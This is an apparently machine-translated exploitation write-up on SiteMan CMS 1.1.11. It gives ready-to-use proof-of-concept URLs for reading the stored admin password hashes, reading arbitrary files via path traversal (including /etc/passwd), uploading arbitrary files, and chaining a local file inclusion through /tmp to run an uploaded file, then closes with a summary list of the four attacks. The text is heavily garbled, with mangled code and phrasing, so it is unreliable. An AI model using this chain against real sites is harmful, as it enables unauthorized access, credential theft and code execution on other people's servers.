SiteMan Cms vulnerability & amp; exploitation tips

Yesterday, I found a sub-station using siteman cms and the source code. I can see that SITEMAN CMS is a widely used program written in PHP, TXT is used as a database TXT. The security of the database is certainly high, but it is used by many people outside China. test environment: Linux + apache + php + mysql siteman 1.1.11 siteman cms remote password HASH read: http://XXX.COM//data/members.txt Use MD5 encryption and decryption to access the background http://www.bkjia.com /Admin. php can normally upload arbitrary files in the background http://xxx.com/admin.php?do=edfiles This server imposes directory restrictions on apache permissions. The file manager fails to generate files. When FTP is used to operate files, the Administrator finds an Arbitrary File Read vulnerability. http://XXX.com/admin.php?do=edtxt&file=../../../../../../../etc/passwd When I was helpless again, I found that the Code had something fun: Index. php 4th rows or so if (isset ($ _ GET ["page"]) {if (substr ($ _ GET ["page )! = ". ") {$ Page = $ _ GET [" page "];} else {$ page =" index ";}} else {$ page =" index ";} about 40th rows $ content = "pages /". $ page. ". php "; around 96th lines of include_once ($ content); I don't explain the local Inclusion Vulnerability you all know. This is easy to do. Since the website has no access to all the records, the TMP directory must have the permission.
Using ../upload files to any directory with Arbitrary File Read vulnerability to see if the upload is successful has been successfully uploaded and then burst chrysanthemum http://XXX.COM/index.php? Do = default & page = /.. /.. /.. /.. /.. /.. /.. /tmp/2 do not need to be included. php has around 40th lines $ content = "pages /". $ page. ". php "; summary: 1: Siteman administrator password hash read vulnerability POC: http://XXX.COM/data/members.txt 2: Arbitrary File Read vulnerability POC: http; // XXX. COM/admin. php? Do = edtxt & file = ../admin. php 3: Contains local vulnerability POC: http://XXX.COM/index.php? Do = default & page = XXX 4: When the upload fails, please do not forget to try the TMP temporary directory and reuse